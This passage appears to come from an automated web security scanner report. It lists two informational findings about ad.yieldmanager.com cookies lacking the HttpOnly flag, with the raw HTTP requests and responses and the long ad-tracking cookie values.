$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0021.rm.bf1
Set-Cookie: ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
Set-Cookie: vuday1=!!!!#N==#3P+HYn; path=/; expires=Fri, 13-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eH~M.jTN"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://cpadominator.com/campaigns/index.php?g=cxnsw&kw=ym
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:06 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

14.51. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1748713&_salt=1407533862&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

14.52. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%4!!*oY!!!!,=!=9l!!-?2!!!!2=!=9l!!-O3!!!!'=!=9l!!.tS!!!!-=!=9l!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!1jo!!!!#=!=9l!!2(j!!!!/<whqI!!2+Y!!!!#=!=9l!!2a*!!!!#=!4ti!!4<!!!!!#=!=9l!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!=d!!!!!#=!=9l!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!ONX!!!!#<wle$!!ObA!!!!-=!=9l!!Os7!!!!#=!=9l!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!Zwa!!!!#=!=9l!!Zwb!!!!+=!=9l!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!g[r!!!!#=!=9l!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!-=!=9l!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!-=!=9l!!wQ3!!!!-=!=9l!!wQ4!!!!#=!=9l!!wQ5!!!!-=!=9l!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!!ypo!!!!#=!=9l!##!O!!!!#=!=9l!#%hB!!!!#=!=9l!#'uj!!!!#<wsgD!#*2)!!!!#=!=9l!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*0!!!!#=!=9l!#1*C!!!!+=!=9l!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#6oy!!!!#=!=9l!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8ZP!!!!#=!=9l!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#M]c!!!!)<xt,H!#O29!!!!+=!=9l!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!+=!=9l!#Z8E!!!!#=!=9l!#ZPp!!!!#<y,`,!#Zb$!!!!#=!=9l!#Zc#!!!!#=!=9l!#ZcE!!!!#=!=9l!#Zdi!!!!#=!=9l!#Zkn!!!!#=!=9l!#Zkq!!!!#=!=9l!#]%`!!!!%=!$iT!#]7$!!!!#=!=9l!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!+=!=9l!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!+=!=9l!#`S2!!!!-=!=9l!#`U0!!!!,=!=9l!#`U9!!!!+=!=9l!#a4,!!!!#<y,`,!#a=6!!!!,=!=9l!#a=7!!!!,=!=9l!#a=9!!!!,=!=9l!#a=G!!!!#=!=9l!#a=J!!!!#=!=9l!#a=P!!!!,=!=9l!#a>3!!!!#=!=9l!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c8V!!!!+=!=9l!#c8W!!!!+=!=9l!#c8X!!!!+=!=9l!#c8]!!!!+=!=9l!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!%=!=9l!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#ec9!!!!#=!=9l!#fBj!!!!#=!=9l!#fBk!!!!#=!=9l!#fBl!!!!#=!=9l!#fBm!!!!#=!=9l!#fBn!!!!#=!=9l!#fG)!!!!+=!=9l!#fG+!!!!,=!=9l!#ffc!!!!#=!27c!#g<r!!!!#=!=9l!#g<s!!!!#=!=9l!#g=!!!!!+=!=9l!#g]5!!!!)<xdAS!#gar!!!!#=!=9l!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#n`.!!!!#=!27c!#ne_!!!!+=!=9l!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#qM!!!!!#=!=9l!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#trq!!!!#=!=9l!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!+=!=9l!#uR7!!!!#=!=9l!#ujQ!!!!+=!=9l!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vA$!!!!#=!=9l!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#x4V!!!!#=!=9l!#x4r!!!!#=!=9l!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#4B!!!!#=!=9l!$#4C!!!!#=!=9l!$#4E!!!!#=!=9l!$#4F!!!!#=!=9l!$#B>!!!!*=!=9l!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!-=!=9l!$(Gt!!!!/=!2<(!$(S9!!!!+=!=9l!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!-=!=9l!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!+=!=9l!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 11:03:11 GMT
BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

